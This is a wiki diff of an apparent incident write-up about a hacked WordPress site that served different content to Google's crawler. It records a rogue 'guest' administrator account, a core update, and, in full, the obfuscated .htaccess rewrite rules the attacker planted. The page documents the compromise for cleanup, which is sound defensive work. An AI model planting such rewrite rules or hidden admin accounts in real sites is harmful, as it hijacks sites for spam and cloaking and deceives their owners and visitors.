Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
hacked:wordpress_site_show_different_content_if_google_bot_visit_this_site [2017/07/04 16:10]
Mohammed AlShannaq
hacked:wordpress_site_show_different_content_if_google_bot_visit_this_site [2017/07/04 17:11] (current)
Mohammed AlShannaq
Line 19: Line 19:
 While analyzing the hacked website I Noticed that the there are a new user with user name "​guest"​ and administrator permission created recently. it look like its created with a wordpress bug or something like that. So I deleted the user guest. While analyzing the hacked website I Noticed that the there are a new user with user name "​guest"​ and administrator permission created recently. it look like its created with a wordpress bug or something like that. So I deleted the user guest.
  
-I notieced that the hacked WordPress site was Running Wordpress 4.7.5 so I also updated to the latest version WordPress version,+I notieced that the hacked WordPress site was Running Wordpress 4.7.5 so I also updated to the latest version WordPress version
 + 
 + 
 +Also I noticed that the hacker has been added the following code to the .htaccess file 
 + 
 +<​code>​ 
 +<​IfModule mod_rewrite.c>​ 
 +RewriteEngine On 
 +RewriteBase / 
 +RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)%[0-9]+%[0-9]+(.*)%(.*)[0-9]+%[0-9]+%([^\d\/​]+)[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+([0-9]+)%(.*)[0-9]+%[0-9]+%([^\d\/​]+)(.*)%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+F%(.*)[0-9]+%[0-9]+%[0-9]+$ ?​$10$8=$3&​%{QUERY_STRING}[L] 
 +RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*..*%[0-9]+F.*%[0-9]+F[0-9]+&​.*=.*%[0-9]+(.*)%[0-9]+F%[0-9]+F.*..*..*..*%[0-9]+F.*%[0-9]+F.*%[0-9]+F[0-9]+%[0-9]+F&​.*=.*_.*_.*&​.*_.*=.*&​.*=.*J.*YW.*I.*XR.*SI.*I.*R[0-9]+.*GU.*O.*J.*WN[0-9]+.*GV[0-9]+.*([0-9]+)I.*I.*N.*U.*O.*I.*M.*[0-9]+MTI[0-9]+I.*F.*I.*L([0-9]+)J.*YW[0-9]+.*I.*ZG[0-9]+.*I.*I.*N.*SI[0-9]+MS.*Y[0-9]+.*([0-9]+)I[0-9]+I.*R.*[0-9]+.*L([0-9]+)J.*ZSI[0-9]+MS.*Y.*[0-9]+.*I.*L([0-9]+)J.*[0-9]+.*O.*(.*).*I.*R.*I[0-9]+MX[0-9]+%[0-9]+([0-9]+)$ ?​$2$79=$88&​%{QUERY_STRING}[L] 
 +RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*..*%[0-9]+F.*%[0-9]+F[0-9]+.*&​.*=.*%[0-9]+(.*)%[0-9]+F%[0-9]+F.*..*..*..*%[0-9]+F.*%[0-9]+F.*%[0-9]+F[0-9]+%[0-9]+F&​.*=.*_.*_.*&​.*_.*=.*&​.*=.*J.*YW.*I.*XR.*SI.*I.*R[0-9]+.*GU.*O.*J.*WN[0-9]+.*GV[0-9]+.*([0-9]+)I.*I.*N.*U.*O.*I.*M.*[0-9]+MTI[0-9]+I.*F.*I.*L([0-9]+)J.*YW[0-9]+.*I.*ZG[0-9]+.*I.*I.*N.*SI[0-9]+MS.*Y[0-9]+.*([0-9]+)I[0-9]+I.*R.*[0-9]+.*L([0-9]+)J.*ZSI[0-9]+MS.*Y.*[0-9]+.*I.*L([0-9]+)J.*[0-9]+.*O.*(.*).*I.*R.*I[0-9]+MX[0-9]+%[0-9]+([0-9]+)$ ?​$2$79=$88&​%{QUERY_STRING}[L] 
 +RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)%[0-9]+\/​.*..*$ ?​$2$1=$3&​%{QUERY_STRING}[L] 
 +RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)%[0-9]+\/​$ ?​$2$1=$3&​%{QUERY_STRING}[L] 
 +RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)%[0-9]+$ ?​$2$1=$3&​%{QUERY_STRING}[L] 
 +RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)%[0-9]+%[0-9]+\/​.*..*$ ?​$2$1=$3&​%{QUERY_STRING}[L] 
 +RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)%[0-9]+%[0-9]+\/​$ ?​$2$1=$3&​%{QUERY_STRING}[L] 
 +RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)%[0-9]+%[0-9]+$ ?​$2$1=$3&​%{QUERY_STRING}[L] 
 +RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+).*W[0-9]+-V(.*)(.*)(.*).*..*$ ?​$2$1=$3&​%{QUERY_STRING}[L] 
 +RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)R([^\d\/​]+).*-[0-9]+.*[0-9]+_.*[0-9]+X.*O[0-9]+QR.*O.*LQH.*U.*([0-9]+)L.*([^\d\/​]+)\/​.*[0-9]+\/​%[0-9]+(.*)[0-9]+%[0-9]+%[0-9]+%[0-9]+(.*)[0-9]+%[0-9]+%[0-9]+(.*)[0-9]+%[0-9]+(.*)[0-9]+%[0-9]+%[0-9]+([^\d\/​]+)[0-9]+%[0-9]+(.*)[0-9]+%[0-9]+%[0-9]+(.*)([0-9]+)%[0-9]+(.*)[0-9]+%[0-9]+%[0-9]+([^\d\/​]+)([0-9]+)%[0-9]+(.*)[0-9]+%[0-9]+%[0-9]+..*$ ?​$27$28=$25&​%{QUERY_STRING}[L] 
 +RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+).*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+..*$ ?​$2$1=$3&​%{QUERY_STRING}[L] 
 +RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+).*S.*IOI\/​(.*)(.*)(.*)(.*)(.*)(.*)(.*)(.*)([0-9]+)L.*\/​.*U[0-9]+.*K[0-9]+.*R([^\d\/​]+).*Y.*Y.*[0-9]+U.*[0-9]+R.*K.*Q.*G.*F[0-9]+.*([0-9]+)(.*).*\/​.*[0-9]+\/​([0-9]+)[0-9]+.*([0-9]+)[0-9]+U[0-9]+(.*)(.*).*T.*..*$ ?​$21$33=$16&​%{QUERY_STRING}[L] 
 +RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+).*O.*R[0-9]+.*[0-9]+V.*MSK([0-9]+)[0-9]+.*([0-9]+)PZ.*Q.*U.*(.*)([0-9]+)L.*([^\d\/​]+)\/​.*[0-9]+\/​[0-9]+.*[0-9]+Y.*MW.*L._SX[0-9]+_([^\d\/​]+)O[0-9]+%[0-9]+([0-9]+)[0-9]+%[0-9]+([0-9]+)[0-9]+%[0-9]+([0-9]+)[0-9]+_..*$ ?​$26$30=$11&​%{QUERY_STRING}[L] 
 +RewriteRule ^([^\d\/​]+)\/​([0-9]+)-([0-9]+)..*$ ?​$1$2=$3&​%{QUERY_STRING}[L] 
 +RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+).*[0-9]+.*[0-9]+.*..*$ ?​$2$1=$3&​%{QUERY_STRING}[L] 
 +RewriteRule ^(.*)\/​([^\d\/​]+)\/​([0-9]+)_([0-9]+)..*$ ?​$2$4=$3&​%{QUERY_STRING}[L] 
 +RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+).*[0-9]+..*$ ?​$2$1=$3&​%{QUERY_STRING}[L] 
 +RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+)..*$ ?​$2$1=$3&​%{QUERY_STRING}[L] 
 +RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+).*..*$ ?​$2$1=$3&​%{QUERY_STRING}[L] 
 +RewriteRule ^([0-9]+)\/​([^\d\/​]+)([0-9]+).*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+..*$ ?​$2$1=$3&​%{QUERY_STRING}[L] 
 +RewriteRule ^index\.php$ - [L] 
 +RewriteCond %{REQUEST_FILENAME} !-f 
 +RewriteCond %{REQUEST_FILENAME} !-d 
 +RewriteRule . /index.php [L] 
 +RewriteRule ^.*\/​([^\d\/​]+)\/​([0-9]+)-([0-9]+)\/​(.*)-.*\/​.*..*$ ?​$1$2=$3&​%{QUERY_STRING}[L] 
 +</​IfModule>​ 
 +</​code>​